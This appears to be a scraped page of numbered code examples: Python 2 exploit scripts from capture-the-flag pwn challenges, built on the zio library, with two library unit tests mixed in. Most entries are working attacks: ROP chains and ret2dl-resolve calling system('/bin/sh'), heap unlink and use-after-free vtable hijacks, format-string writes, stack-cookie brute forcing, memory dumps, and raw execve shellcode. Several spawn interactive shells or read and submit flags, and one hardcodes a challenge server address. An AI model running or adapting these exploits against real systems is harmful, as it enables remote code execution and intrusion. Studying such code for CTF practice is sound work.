    puts_addr = l64(io.readline()[:-1].ljust(8, '\x00'))  # pad the leaked bytes to 8 before unpacking
    '''
    base = puts_addr - 0x000000000006F5D0

    system = base + 0x0000000000045380

    print 'system', hex(system)
    binsh = base + 0x000000000018C58B
    '''

    base = puts_addr - 0x000000000006FD60  # libc offsets for one build (base now means libc base)
    print 'base', hex(base)
    system = base + 0x0000000000046590
    binsh = base + 0x000000000017C8C3

    #io.gdb_hint()
    io.read_until(':')
    io.writeline(str(92233720368547759))

    fake_rsp = rsp - 0x80

    addr = l64(rol(fake_rsp ^ cookie)) + l64(rol(pop_rdi_ret ^ cookie))
    print HEX(addr)
    io.gdb_hint()
    edit(io, 1, 0, "", addr, "")

    io.read_until('>>')
    payload = '5;' + 'a' * 6

    payload += l64(binsh) + l64(system) + l64(main)  # system("/bin/sh"); back to main
    io.writeline(payload)

    #io.gdb_hint()
    interact(io)
Пример #23
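def get_io(target):
	"""Return a quiet zio session to `target` with LD_PRELOAD=libc_file_path in its environment.

	Tracing is disabled (print_read/print_write False) and the timeout is a
	deliberately short 20. libc_file_path is a module-level name, so a
	locally spawned target runs against the libc the offsets were taken
	from; for a (host, port) target the env presumably has no effect on the
	remote side. Use print_read=COLORED(RAW, "green") and
	print_write=COLORED(RAW, "blue") when debugging; the dead locals that
	used to build those modes and then discard them have been removed.
	"""
	return zio(target, timeout = 20, print_read = False, print_write = False, env={"LD_PRELOAD":libc_file_path})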
Пример #24
def exp(target):
    """Run the write_any() primitive (defined elsewhere) on `target`, then hand over the shell.

    Reads are echoed in red and writes in green; the timeout is 10000.
    """
    trace_in = COLORED(RAW, 'red')
    trace_out = COLORED(RAW, 'green')
    session = zio(target, timeout=10000, print_read=trace_in, print_write=trace_out)
    write_any(session)
    session.interact()
Пример #25
def get_io(target):
	"""Open `target`, echo its captcha straight back, and return (io, captcha).

	Whatever read_until("\\n") returns for the captcha line is written back
	unchanged, so the caller receives exactly the bytes that were sent; the
	session is left positioned just after the 'then paste me!' line.
	"""
	session = zio(target, timeout = 9999)
	session.read_until("input captcha : ")
	captcha = session.read_until("\n")
	session.write(captcha)
	session.read_until("then paste me!\n")
	return session, captcha
Пример #26
def exp(target):
    """ret2dl-resolve over a 16-byte write primitive (write_16byte/generate_fake_relro/generate_fake_sym/interact live elsewhere).

    Stage 1: a small chain (write(1, leak_addr, rdx as-is), then pop rbp /
    jump to 0x400582) is planted at 0x601b00 and run via a 'leave; ret'
    pivot ('a'*0x10, fake rbp 0x601b00-8, leave_ret); the 8 bytes returned
    after ':' are taken as a link_map pointer, +0x28. Stage 2:
    link_map+0x1c8 is zeroed (presumably the DT_VERSYM entry so symbol
    versioning is skipped - verify for this glibc), a fake Elf64_Rela at
    0x601058 and Elf64_Sym at 0x601078 are written, the string 'system' is
    placed at 0x601098 (st_name is presumably chosen to land there) and
    '/bin/sh' at 0x601a50. The final chain pops rdi='/bin/sh' and enters
    PLT0 with the forged relocation index, so the resolver calls system().
    Every address and index is for one binary.
    """
    io = zio(target,
             timeout=10000,
             print_read=COLORED(RAW, 'red'),
             print_write=COLORED(RAW, 'green'))
    pop_rdi_ret = 0x0000000000400603
    pop_rsi_r15_ret = 0x0000000000400601
    leak_addr = 0x600ef0
    write_plt = 0x0000000000400430
    pop_rbp_ret = 0x4004d0
    # rsi = leak_addr, r15 = 0, rdi = 1 -> write@plt; then rbp = 0x601f00 and continue at 0x400582
    leak_rop = l64(pop_rsi_r15_ret) + l64(leak_addr) + l64(0) + l64(
        pop_rdi_ret) + l64(1) + l64(write_plt)
    leak_rop += l64(pop_rbp_ret) + l64(0x601f00) + l64(0x400582)

    for i in range(0, len(leak_rop), 8):
        write_16byte(io, 0x601b00 + i, leak_rop[i:i + 8] + '\x00' * 8)

    leave_ret = 0x40059d
    leak_stack_povit = 'a' * 0x10 + l64(0x601b00 - 0x8) + l64(leave_ret)  # saved rbp -> chain-8, ret -> leave;ret
    io.write(leak_stack_povit)

    io.read_until(':')
    link_map_addr = l64(io.read(8)) + 0x28
    print hex(link_map_addr)

    r_offset = 0x601970  # a writable addr
    r_sym = 0x155e8

    fake_relro = generate_fake_relro(r_offset, r_sym).ljust(0x20, '\x00')

    st_name = 0x200d68
    fake_sym = generate_fake_sym(st_name).ljust(0x20, '\x00')

    write_16byte(io, link_map_addr + 0x1c8, '\x00' * 0x10)
    #write_16byte(io, 0x600858, l64(0x6ffffff0)+l64(0x3d57d6))

    for i in range(0, len(fake_relro), 8):
        write_16byte(io, 0x601058 + i, fake_relro[i:i + 8] + '\x00' * 8)
    for i in range(0, len(fake_sym), 8):
        write_16byte(io, 0x601078 + i, fake_sym[i:i + 8] + '\x00' * 8)

    write_16byte(io, 0x601098, 'system'.ljust(16, '\x00'))
    write_16byte(io, 0x601a50, '/bin/sh'.ljust(16, '\x00'))

    plt0 = 0x400420

    rop = l64(pop_rdi_ret) + l64(0x601a50)
    index = 0x155dc  # forged relocation index pushed for PLT0
    rop += l64(plt0) + l64(index)

    for i in range(0, len(rop), 8):
        write_16byte(io, 0x601980 + i, rop[i:i + 8] + '\x00' * 8)

    stack_povit = 'a' * 0x10 + l64(0x601980 - 0x8) + l64(leave_ret)  # second pivot into the final chain
    io.write(stack_povit)

    interact(io)
Пример #27
def exp(target):
    """Plant system@plt and a 'sh' string address via the write primitives, then trigger.

    write_dword()/write_byte() are defined elsewhere; 0x2c and 0x2c+8 are
    the two slots that receive system (0x080483E0) and the string address
    (0x804828e), and the two write_byte(1, 1) calls are what fires them.
    """
    session = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    sh_str = 0x804828e
    system_plt = 0x080483E0
    for slot, value in ((0x2c, system_plt), (0x2c + 8, sh_str)):
        write_dword(session, slot, value)
    for _ in range(2):
        write_byte(session, 1, 1)
    session.interact()
Пример #28
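def exp(s):
	"""Send `s` to ./tlc at its first ':' prompt and return the line that follows the second.

	Returns None if the child stops responding after the input is sent
	(any error from the second read is swallowed, as a probe helper wants).
	The session is always closed, including on that error path; errors
	before the input is sent still propagate.
	"""
	io = zio('./tlc')
	io.read_until(':')
	io.writeline(s)
	try:
		io.read_until(':')
		return io.readline()
	except Exception:
		return None
	finally:
		io.close()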
Пример #29
def attack(host='127.0.0.1', port=1234, shell=False):
    """Run the exploit (start(), defined elsewhere) and fetch the flag.

    When `host` equals the module-level `local` path the binary is spawned
    locally with coloured REPR tracing and start() gets debug=1; otherwise
    a quiet socket session to (host, port) is used with debug=0. With
    shell=True the live session is returned; otherwise the module-level
    `cmd` is sent, one line is read back, the session is closed and the
    stripped line is returned as the flag.
    """
    is_local = (host == local)
    if is_local:
        session = zio(local, print_read=COLORED(REPR,'yellow'),\
                print_write=COLORED(REPR,'blue'))
    else:
        session = zio((host, port), print_read=False, print_write=False)

    start(session, 1 if is_local else 0)

    if shell:
        return session
    session.write(cmd+'\n')
    flag = session.readline().strip()
    session.close()
    return flag
Пример #30
def exp(target):
    """Heap exploit on the 'req' list (login/add_req/del_req/change_req/print_req/menu/interact live elsewhere).

    Seven requests are made and every other one freed; an overlong
    change_req(0, 'a'*0x47) makes print_req() spill the qword that follows,
    taken as a heap pointer (heap_base = leak - 0xe0). Requests 0, 2 and 4
    then get their trailing pointer pair set to 0x609E80 (a global whose
    meaning is not visible here), request 6 receives an opaque encoded
    x86-64 shellcode blob, and request 3 gets a 'push imm32; ret' stub
    aimed at heap_base+0x1b0 (note l64 supplies 8 bytes after the 0x68
    opcode; only 4 are the immediate, the rest decode as instructions
    before the 0xc3) followed by two heap pointers. Two more add_req()
    calls and menu(1) trigger it. sc_addr is unused. Addresses are for one
    build.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))
    login(io)

    add_req(io, '11111111')
    add_req(io, '22222222')
    add_req(io, '33333333')
    add_req(io, '44444444')
    add_req(io, '55555555')
    add_req(io, '66666666')
    add_req(io, '77777777')


    del_req(io, 1)
    del_req(io, 3)
    del_req(io, 5)

    #leak
    change_req(io, 0, 'a'*0x47)  # one byte short of the field, so the following qword prints too

    print_req(io)

    io.read_until('a'*0x47+'\n')
    leak_value = l64(io.readline()[:-1].ljust(8, '\x00'))  # pad the spilled bytes to 8 before unpacking
    print hex(leak_value)
    heap_base = leak_value - 0xe0

    atoi_got = 0x00000000006099D8
    payload = l64(atoi_got-0x18)*8  # unlink-style fd value, repeated to fill the record
    change_req(io, 0, payload + l64(0x0000000000609E80)+l64(0x0000000000609E80))
    change_req(io, 2, 'b'*0x40 + l64(0x0000000000609E80)+l64(0x0000000000609E80))
    change_req(io, 4, 'c'*0x40 + l64(0x0000000000609E80)+l64(0x0000000000609E80))
    # opaque encoded shellcode (self-decoding x86-64 stub); source not visible here
    buf = ""
    buf += "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05"
    buf += "\xef\xff\xff\xff\x48\xbb\xaa\xfb\x07\x50\x07\x4b\x98"
    buf += "\xc5\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
    buf += "\xc0\xc0\x5f\xc9\x4f\xf0\xb7\xa7\xc3\x95\x28\x23\x6f"
    buf += "\x4b\xcb\x8d\x23\x1c\x6f\x7d\x64\x4b\x98\x8d\x23\x1d"
    buf += "\x55\xb8\x0f\x4b\x98\xc5\x85\x99\x6e\x3e\x28\x38\xf0"
    buf += "\xc5\xfc\xac\x4f\xd9\xe1\x44\x9d\xc5"
    change_req(io, 6, buf)
    #change_req(io, 2, 'b'*0x50)
    #io.gdb_hint()
    sc_addr = 0x6161616161616161  # unused
    # shellcode64
    add_req(io, '88888')
    payload2 = '\x68'+l64(heap_base+0x1b0)+'\xc3'  # push <low 4 bytes>; ...; ret
    payload2 = payload2.ljust(0x10, 'a')
    change_req(io, 3, payload2+l64(heap_base+0x30)+l64(heap_base+0x60))

    add_req(io, '99999')
    menu(io, 1)

    interact(io)
Пример #31
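def connect():
    """Connect to the challenge server, solve its SHA1 proof-of-work, and return the session.

    The banner line is expected to look like 'SHA(<regex>) = <hexdigest>'
    (an IndexError surfaces if it does not). Candidate strings are
    enumerated from the regex with exrex and the first whose sha1
    hexdigest matches is sent back. If no candidate matches, the session is
    closed and RuntimeError is raised instead of blocking forever on a
    'your answer' line that will never come. The server address is fixed.
    """
    io = zio(('119.254.101.232', 8888))
    regex = re.compile(r'SHA\((.*?)\) = ([\d\w]+)')
    _reg, _hash = regex.findall(io.read_until('\n'))[0]
    for candidate in exrex.generate(_reg):
        if sha1(candidate).hexdigest() == _hash:
            io.write(candidate + '\n')
            break
    else:
        io.close()
        raise RuntimeError('no string matching %r hashes to %s' % (_reg, _hash))
    io.read_until('your answer\n')
    return io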
Пример #32
def exp(target):
    """Use-after-free / vtable hijack in a C++ 'tv'/'movie' database (add_tv/add_movie/remove_entry/show_all live elsewhere).

    Three 'tv' entries are created under one name and removed together;
    the 'movie' created next reuses that memory with a fake object whose
    first qword is movie_vt (0x4015b0, evidently a vtable address) and
    whose last qword is a pointer - first malloc@got, then db_addr - so
    show_all() prints malloc's libc address and a heap address. addr2
    rebases that leak onto system with the '#local' offsets (the '#remote'
    pair is commented out). The last fake object carries '/bin/sh;' and a
    vtable pointer redirected into the heap (fake_vt), where
    add_movie(l64(addr2), ...) has just placed system's address, so menu
    option '4' ends up calling it. Addresses are for one build; a
    gdb_hint() pause is left active.
    """
    io = zio(target,
             timeout=10000,
             print_read=COLORED(RAW, 'red'),
             print_write=COLORED(RAW, 'green'))

    add_tv(io, 'aaa', 100, 200, 'bbbb')  #0x602010
    add_tv(io, 'aaa', 100, 200, 'bbbb')  #0x6020f0
    add_tv(io, 'aaa', 100, 200, 'bbbb')  #0x6021d0

    remove_entry(io, 'aaa')

    malloc_got = 0x0000000000601C58

    db_addr = 0x601dc0
    movie_vt = 0x00000000004015b0

    # fake object: vtable, 8 filler, 56 zero, 8 filler, 0x78 zero, a marker
    # qword (meaning not visible), then the pointer show_all() will dereference
    payload = l64(movie_vt) + 'a' * 8 + '\x00' * 56 + 'b' * 8 + '\x00' * (
        0x80 - 8) + l64(0x0000006443480000) + l64(malloc_got)
    print len(payload)
    add_movie(io, 'ccc', payload, 300, 'eeee')  #0x602010 0x602110

    add_tv(io, 'hhh', 100, 200, 'bbbb')  #0x6021e0
    add_tv(io, 'hhh', 100, 200, 'bbbb')  #0x6022c0
    add_tv(io, 'hhh', 100, 200, 'bbbb')  #0x6023a0
    remove_entry(io, 'hhh')

    payload = l64(movie_vt) + 'a' * 8 + '\x00' * 56 + 'b' * 8 + '\x00' * (
        0x80 - 8) + l64(0x0000006443480000) + l64(db_addr)
    add_movie(io, 'ccc', payload, 300, 'eeee')

    malloc_addr, heap_addr = show_all(io)

    io.gdb_hint()
    add_tv(io, 'jjj', 100, 200, 'bbbb')  #0x6023b0
    add_tv(io, 'jjj', 100, 200, 'bbbb')  #0x602490
    add_tv(io, 'jjj', 100, 200, 'bbbb')  #0x602570
    remove_entry(io, 'jjj')

    #local
    addr2 = malloc_addr - 0x00007FFFF7277750 + 0x00007FFFF723B52C  # system = malloc - malloc_addr_local + system_addr_local

    #remote
    #addr2 = malloc_addr - 0x0000000000082750 + 0x000000000004652c

    fake_vt = 0x6023b0 + 8 - 0x602010 + heap_addr  # heap slot (rebased on the leak) holding system's address
    payload = l64(fake_vt) + '/bin/sh;' + '\x00' * 56 + 'b' * 8 + '\x00' * (
        0x80 - 8) + l64(0x0000006443480000) + l64(db_addr)
    print len(payload)
    add_movie(io, l64(addr2), payload, 300, 'eeee')  # the name field carries system's address

    io.writeline('4')
    io.interact()
Пример #33
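def leak_got(offset):
    """Leak 8 bytes at base+offset through the stack-overflow ROP chain; returns them as an int.

    Module-level inputs: host, stack_cookie, saved_rbp, base. After 8200
    bytes of filler, the cookie and saved rbp are replayed and the chain
    runs the base+0xec6 / base+0xeb0 gadget pair (it has the shape of the
    usual __libc_csu_init pop/call pair - not verifiable here) with
    base+0x202018, base+offset and 4 among its arguments. Whatever the
    target sends after 'thanks.\\n' is read (up to 8 bytes), zero-padded to
    8 and unpacked. The connection is always closed, even if a read fails.
    """
    io = zio((host, 1234), print_write = False, print_read = False, timeout = 100000)
    try:
        rop = 'A' * 8200 + l64(stack_cookie) + l64(saved_rbp)
        rop += l64(base + 0xec6) + 'A' * 8 + l64(5) + 'B' * 8 + l64(base + 0x202018) + 'C' * 8 + l64(base + offset) + l64(4)
        rop += l64(base + 0xeb0)

        io.write(rop)

        io.read_until('thanks.\n')
        left = io.read(8)
    finally:
        io.close()
    return l64(left + '\x00' * (8 - len(left)))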
Пример #34
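def pwn (target, dis):
    """One attempt at the 'dian_cai' heap exploit with a guessed atoi->system distance `dis`.

    Helpers input_info/dian_cai/link_heap/sublit live elsewhere. An order
    whose name overflows into the next record plants atoi@got-4, link_heap()
    leaks atoi's address, and a second overflow plants a pointer near
    0x0804B1C0. system is then taken as atoi + `dis` (the offset tables are
    kept for reference but not used), normalised to a signed 32-bit int the
    way the original did, and written via dian_cai(). After '/bin/sh' is
    sent and the interactive session ends, whatever is left on the
    connection is read for a second: a flag-like or 'No such file' response
    is appended with the winning `dis` to the file 'flga-4002' and the
    process exits with 0; otherwise the session is closed and the caller
    can try the next `dis`. The output file is now closed via `with`.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    #io = zio(target, timeout=10000, print_read=None, print_write=None)

    input_info(io)
    dian_cai(io, 'aaa', 1)

    read_got = 0x0804b010
    atoi_got = 0x0804B038

    #puts_got = 0x0804b02c

    payload = 'a'*32+l32(atoi_got-4)  # 32 bytes of name, then the pointer that lands in the next record
    dian_cai(io, payload, 2)

    atoi_addr = link_heap(io)
    #system_addr = 0xf7e39190

    #io.gdb_hint()

    payload2 = 'a'*32+l32(0x0804B1C0-8)
    dian_cai(io, payload2, 3)

    sublit(io)
    payload = 'a'*4+l32(atoi_got)

    offset_read = 0x000da8d0
    offset_system = 0x0003e800
    offset_puts = 0x000656a0
    offset_atoi = 0x0002fbb0
    print "dis:",hex(dis), "com:", hex(offset_system - offset_atoi)
    #libc_base = atoi_addr - offset_atoi
    #system_addr = libc_base + offset_system
    #system_addr = libc_base + offset_puts
    system_addr = atoi_addr + dis
    # dian_cai's numeric argument is fed through atoi-style parsing; pass the
    # address as a signed 32-bit value so large addresses round-trip
    system_addr = struct.unpack("i", l32(system_addr))[0]
    sublit(io)
    dian_cai(io, payload, system_addr)
    #io.writeline('/bin/cat /home/shaxian/flag')
    io.writeline('/bin/sh\n')
    io.interact()
    #data = io.read(1024)
    data = io.read_until_timeout(1)
    if "RCTF" in data or "No such file" in data:
        print "herre"
        data += "dis:" + hex(dis) + "com:" + hex(offset_system - offset_atoi)
        with open("flga-4002", 'w') as file_w:
            file_w.write(data)
        exit(0)
    else:
        io.close()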
Пример #35
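    def test_attach_socket(self):
        """zio() must accept an already-connected socket and keep reading from it.

        socat serves a tiny HTTP-like reply on a random loopback port. The
        test reads the status line itself with raw recv(), then wraps the
        same socket in zio and checks the remaining lines arrive intact.
        Up to four ports are tried; if none can be bound the test fails
        instead of passing vacuously. socat is always reaped and the socket
        closed, whichever path is taken.
        """
        print('')

        def stop(proc):
            # terminate socat, escalating to kill if it ignores SIGTERM
            proc.terminate()
            for _ in range(10):
                if proc.poll() is not None:
                    return
                time.sleep(0.2)
            try:
                proc.kill()
            except Exception:  # NOQA
                pass  # already gone

        for _ in range(4):
            port = random.randint(31337, 65530)
            # bind=127.0.0.1: the SYSTEM: address runs a shell, so the listener
            # must never be reachable beyond loopback (the client only connects there)
            p = subprocess.Popen([
                'socat',
                'TCP-LISTEN:%d,bind=127.0.0.1,crlf' % port,
                'SYSTEM:"echo HTTP/1.0 200; echo Content-Type: text/plain; echo; echo Hello, zio;"'
            ])
            time.sleep(0.2)
            # returncode stays None until poll()/wait() is called
            if p.poll() is not None:
                continue  # socat failed to start (e.g. port already in use)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                s.connect(('127.0.0.1', port))
                line = b''
                while True:
                    c = s.recv(1)
                    if not c:
                        break
                    else:
                        line += c
                    if line.find(b'\n') > -1:
                        break
                assert line.rstrip() == b"HTTP/1.0 200", repr(line)

                io = zio(s)

                line = io.readline()
                self.assertEqual(line.rstrip(), b"Content-Type: text/plain",
                                 repr(line))
                line = io.readline()
                line = io.readline()

                self.assertEqual(line.rstrip(), b"Hello, zio", repr(line))

                io.end()
                io.close()
            except socket.error:
                s.close()
                stop(p)
                continue
            s.close()  # harmless if io.close() already closed the socket
            stop(p)
            break
        else:
            self.fail('could not start socat on any of 4 random ports')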
Пример #36
def exp(target):
    """Plant system@plt and a 'sh' string address via the write primitives, then trigger.

    write_dword()/write_byte() are defined elsewhere; 0x2c and 0x2c+8 are
    the two slots that receive system (0x080483E0) and the string address
    (0x804828e), and the two write_byte(1, 1) calls are what fires them.
    """
    session = zio(target,
                  timeout=10000,
                  print_read=COLORED(RAW, 'red'),
                  print_write=COLORED(RAW, 'green'))
    sh_str = 0x804828e
    system_plt = 0x080483E0
    for slot, value in ((0x2c, system_plt), (0x2c + 8, sh_str)):
        write_dword(session, slot, value)
    for _ in range(2):
        write_byte(session, 1, 1)
    session.interact()
Пример #37
def dump_libc(write_addr, size):
    """Dump `size` bytes starting at libc_base through the stack-overflow ROP chain.

    Module-level inputs: host, stack_cookie, saved_rbp, base, libc_base.
    `write_addr` occupies the first 8 bytes of the 8200-byte overflow; after
    the replayed cookie and saved rbp the chain runs the base+0xec6 /
    base+0xeb0 gadget pair (shaped like the usual __libc_csu_init pop/call
    pair - not verifiable here) with saved_rbp-0x70-0x2000, size, libc_base
    and 4 among its arguments. Everything the target sends after
    'thanks.\\n' is returned raw and the connection is closed.
    """
    conn = zio((host, 1234), print_write = False, print_read = False, timeout = 100000)

    chain = [
        l64(write_addr),
        'A' * (8200 - 8),
        l64(stack_cookie),
        l64(saved_rbp),
        l64(base + 0xec6),
        'A' * 8,
        l64(0),
        'B' * 8,
        l64(saved_rbp - 0x70 - 0x2000),
        l64(size),
        l64(libc_base),
        l64(4),
        l64(base + 0xeb0),
    ]
    conn.write(''.join(chain))

    conn.read_until('thanks.\n')
    dumped = conn.read()
    conn.close()
    return dumped
def exp(target):
    """Store/item exploit: patch the GOT through an out-of-range edit, then a 32-bit stack overflow to system.

    Module-level inputs: payload, addr_blackberry, got_stack_fail,
    addr_puts, addr_store_cmd, got_atoi, offset_atoi, offset_system,
    offset_bin; helpers create_store/add_item/generate live elsewhere.
    Fifteen items are added, the first and last carrying `payload` (the
    last ends with l32(0x08049b74)). The 'b'/'2'/'b' menu walk edits at an
    index derived from addr_blackberry minus the length of one generated
    line, then stores got_stack_fail there. The 'c'/'a' path overflows 32
    bytes and returns into puts(got_atoi) with addr_store_cmd as the return
    address, printing atoi's libc address; a second overflow then calls
    system('/bin/sh') using the hard-coded libc offsets. A gdb_hint()
    pause is left active.
    """
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    store_name='name'*15+'xxx'
    item_name='a'*31
    description='b'*79
    create_store(io,store_name,item_name,description)
    length=len('Blackberry OS Phone Z price: -2147483648 CNY description: ')  # width of one generated line
    generate(io)
    for x in xrange(15):
        if x == 0:
            item_name=payload+'a'*(31-len(payload))
            description = payload+'Z'*(79-len(payload))
        if x == 14:
            description=payload+'Z'*(74-len(payload))+l32(0x08049b74)+'Z'
        add_item(io,item_name,description)
    generate(io)
    # overwrite the GOT
    io.read_until('? ')
    io.writeline('b')
    io.read_until('? ')
    io.writeline('2')
    io.read_until('? ')
    io.writeline('b')
    io.read_until('? ')
    io.gdb_hint()
    io.writeline(str(addr_blackberry-length))  # index expressed relative to the generated text
    io.read_until('? ')
    io.writeline('b')
    io.read_until("? ")
    io.writeline(str(got_stack_fail))
    # stack overflow
    io.read_until('? ')
    io.writeline('c')
    io.read_until('? ')
    io.writeline('a')
    payload2='d'*32+l32(addr_puts)+l32(addr_store_cmd)+l32(got_atoi)  # puts(got_atoi), return to store_cmd
    io.read_until('? ')
    io.writeline(payload2)
    io.read_until('Long.\n')
    data=io.read(4)
    print 'data:%s'%data
    io.read_until('? ')
    real_atoi=l32(data)
    print hex(real_atoi)
    #bin/sh
    real_system=real_atoi-offset_atoi+offset_system
    real_bin=real_atoi-offset_atoi+offset_bin
    payload3='d'*32+l32(real_system)+'1234'+l32(real_bin)  # system('/bin/sh') with a junk return address
    io.writeline(payload3)
    io.read_until('Long.\n')
    io.interact()
Пример #39
def exp3(target):
    """Third exploit variant: one 'add' with a fixed byte payload, then read the flag.

    Python 2 only (``print`` statements, ``/`` is integer division).  Depends
    on module-level names not defined here: add, submit_flag, l32, l8.
    The payload is an opaque machine-code string taken as-is.  io.close()
    is only reached when every earlier call succeeds; on an exception the
    channel is left open.
    """
    io = zio(target, timeout=30, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))
    payload = 'hri\x01\x01\x814$\x01\x01\x01\x011\xd2Rj\x08ZH\x01\xe2RH\x89\xe2jhH\xb8/bin///sPj;XH\x89\xe7H\x89\xd6\x99\x0f\x05'
    add(io, 0x3eeb, 1, payload)
    # 0x80 / 8 == 16; under Python 3 this would be a float and l8 would likely reject it
    index = (0x2030a0 - 0x203020) / 8
    payload = l32(0xdeadfafa) + l8(index)
    io.write(payload)
    io.writeline('./bin/cat flag/flag')
    # drop the trailing newline, then any surrounding whitespace
    flag = io.readline()[:-1].strip()
    print target
    print 'flag', flag
    submit_flag(flag)
    io.close()
Пример #40
def a_byte(num):
	"""Extend the module-level ``payload`` by one byte, trying values 0..255 in order.

	A fresh connection to (ip, 1234) is opened for every candidate.  The
	candidate is accepted — appended to ``payload`` — as soon as the service
	prints a non-empty second line after 'thanks.'.  Returns my_hex(address)
	for the accepted byte, or None when no candidate matched.  ``num`` is
	only used by the commented-out log line.  Depends on module-level ip,
	payload and my_hex.
	NOTE(review): no io.close() on any path, so up to 256 connections per
	call are left for the garbage collector.
	"""
	global payload
	address = 0
	while address <= 255:
		io = zio((ip, 1234), timeout = 100000, print_read = REPR, print_write = COLORED(REPR))
		io.write(payload + chr(address) )
		io.read_until('thanks.')
		io.readline()
		data = io.readline()
		# any output on the second line counts as a hit; an empty read means "try the next value"
		if data != '':
			payload += chr(address)
			result = my_hex(address)
			#log("address_"+ str(num) + ": " + result, 'red')
			return result
		address += 1
Пример #41
def exp(target):
    """Create two items, edit the first with an over-long value, then trigger menu option 4.

    Python 2 only (byte-string literals).  Depends on module-level add_item
    and edit_item, which are not defined here.  The channel is handed to
    io.interact() and never closed here.
    """
    io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green'))
    add_item(io, '123', '111')
    add_item(io, '124', '112')

    # NOTE(review): assigned but never read — the three trailing bytes below are
    # 0x6016c2 little-endian (buf_addr + 2) written inline instead of being derived from it
    buf_addr = 0x6016c0 # point to the address of buffer
    edit_item(io, 1, '222', '2'*0x10 + '3'*0x10 + '\xc2\x16\x60')# overwrite the second node's cleanup pointer

    # http://shell-storm.org/shellcode/files/shellcode-806.php
    shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
    io.read_until('Quit\n')
    io.writeline('4')
    io.read_until(':')
    io.writeline('2\x00' + shellcode)# trigger the second node's cleanup and place the shellcode in the buffer
    io.interact()
Пример #42
    def test_tty_raw_out(self):
        """stdout=TTY_RAW must hand back output exactly as written, CR bytes included.

        Two checks: a printf of ten numbered lines that randomly end in CRLF
        or LF, and a helper script (myprintf.py next to the test runner) that
        echoes every non-printable byte, shuffled, between a CRLF and an LF.
        Neither the line endings nor the unprintable bytes may be altered on
        the way through the TTY_RAW channel.
        """
        printf_parts = []
        expected_parts = []
        for idx in range(10):
            if random.randint(0, 1):
                printf_parts.append('%d\\r\\n' % idx)
                expected_parts.append('%d\r\n' % idx)
            else:
                printf_parts.append('%d\\n' % idx)
                expected_parts.append('%d\n' % idx)
        expected = ''.join(expected_parts)
        io = zio("printf '%s'" % ''.join(printf_parts), stdout=TTY_RAW)
        got = io.read()
        io.close()
        self.assertEqual(got, expected)

        unprintable = [chr(code) for code in range(256) if chr(code) not in string.printable]
        for _ in range(10):
            random.shuffle(unprintable)
        blob = ''.join(unprintable)

        from zio import which
        py = which('python2') or which('python')
        self.assertNotEqual(py, None)
        helper = os.path.join(os.path.dirname(sys.argv[0]), 'myprintf.py')
        # repr()[1:-1] strips the quotes so the escapes are re-interpreted by the helper
        argument = "'\\r\\n" + repr(blob)[1:-1] + "\\n'"
        io = zio(' '.join([py, '-u', helper, argument]), stdout=TTY_RAW, print_read=COLORED(REPR))
        got = io.read()
        self.assertEqual(got, "\r\n" + blob + "\n")
Пример #43
def exp2(target):
    """Second exploit variant: heap-leak based, then read and submit the flag.

    Python 2 only (``print`` statements).  Depends on module-level names not
    defined here: add, delete, show_row, expand, add_row, submit_flag,
    l64, l32, l8.  l64 appears to be used both ways (int -> 8 bytes and
    8 bytes -> int), as in zio.  All offsets (0x50, 0xb80, 0x3c4b78,
    0x45390, 0xcc0, ...) are specific to one binary/libc build.  io.close()
    is only reached when every earlier call succeeds.
    """
    io = zio(target, timeout=30, print_read=COLORED(RAW, 'red'), \
             print_write=COLORED(RAW, 'green'))
    add(io, 20, 8, 'a' * 0xa0)
    add(io, 20, 8, 'a' * 0xa0)
    add(io, 20, 8, 'a' * 0xa0)
    delete(io, 0)
    delete(io, 1)
    add(io, 7, 8, "")

    # diagnostic dump of the seven rows; not needed for the rest of the function
    for i in range(7):
        print i, hex(l64(show_row(io, 0, i)))

    heap_base = l64(show_row(io, 0, 1)) - 0x50
    main_base = l64(show_row(io, 0, 2)) - 0xb80
    print hex(heap_base), hex(main_base)

    delete(io, 0)
    add(io, 20, 8, "")

    libc_base = (l64(show_row(io, 0, 0))) - 0x3c4b78
    print hex(libc_base)

    system = libc_base + 0x0000000000045390

    delete(io, 0)
    add(io, 18, 8, '')
    d1 = l64('/bin/sh;') - 0x0000000800000014
    d = l64(d1)
    # byte-wise difference (mod 256) between the packed system address and main_base + 0xcc0
    for i in range(8):
        val = ord(l64(system)[i]) - ord(l64(main_base + 0xcc0)[i])
        if val < 0:
            val += 0x100
        d += chr(val)
    expand(io, 0, 0x20000002, d)

    add_row(io, 0, 22, 18)
    add_row(io, 0, 25, 19)

    payload = l32(0xdeadfafa) + l8(3) + l32(2) + l32(0)
    io.write(payload)
    io.writeline('./bin/cat flag/flag')
    # drop the trailing newline, then any surrounding whitespace
    flag = io.readline()[:-1].strip()
    print target
    print 'flag', flag
    submit_flag(flag)
    io.close()
Пример #44
def exp(target):
    """Format-string exploit: read two stack values, then write a 4-byte value to a fixed address.

    Python 2 only (``print`` statements; ``/`` is integer division — under
    Python 3 ``path`` and ``index3`` would become floats).  Depends on
    module-level do_fmt and HEX, which are not defined here.  Each
    ``int(..., 16)`` assumes the service answers with a hex number; a
    non-hex reply (e.g. "(nil)") raises ValueError.  The channel is handed
    to io.interact() and never closed here.
    """
    # io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green'))
    io = zio(target, timeout=10000, print_read=COLORED(RAW, "red"), print_write=COLORED(RAW, "green"))

    io.writeline("%17$p")
    argv0 = int(io.readline().strip("\n"), 16)
    io.writeline("%49$p")
    path = int(io.readline().strip("\n"), 16)
    print hex(path)

    # round path up to a multiple of 4
    path = (path + 3) / 4 * 4
    print hex(path)

    # stack slot index of `path` relative to slot 49
    index3 = (path - argv0) / 4 + 49

